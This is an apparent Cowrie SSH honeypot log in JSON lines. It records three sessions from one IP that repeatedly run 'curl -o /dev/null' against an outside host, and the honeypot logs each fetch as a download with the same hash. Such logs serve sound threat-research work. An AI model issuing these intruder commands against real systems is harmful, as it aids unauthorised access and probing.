{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.503644Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.504381Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.504798Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.508555Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.510185Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.511089Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.513470Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.514233Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.568173Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.568992Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.573297Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.579306Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.580317Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.580819Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.584180Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.585540Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.612607Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.613475Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.617897Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.622768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.623808Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.624620Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.630438Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.632633Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.633891Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.661005Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.661810Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.667404Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.670455Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.673349Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.677440Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.679034Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.679759Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.703051Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.703969Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.711157Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.714154Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.716498Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.717556Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.720242Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.721217Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.755126Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.755901Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.759805Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.762514Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.765145Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.768179Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.769820Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.770447Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.798638Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.799481Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.807806Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.808760Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.810691Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.811499Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.814606Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.817415Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.844834Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.845606Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.850256Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.853749Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.857227Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.858257Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.858995Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.861722Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.862643Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.889899Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.890653Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.894960Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.899680Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.905287Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.906080Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.908249Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.909042Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.935435Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.937738Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.939771Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.940273Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.944281Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.967590Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
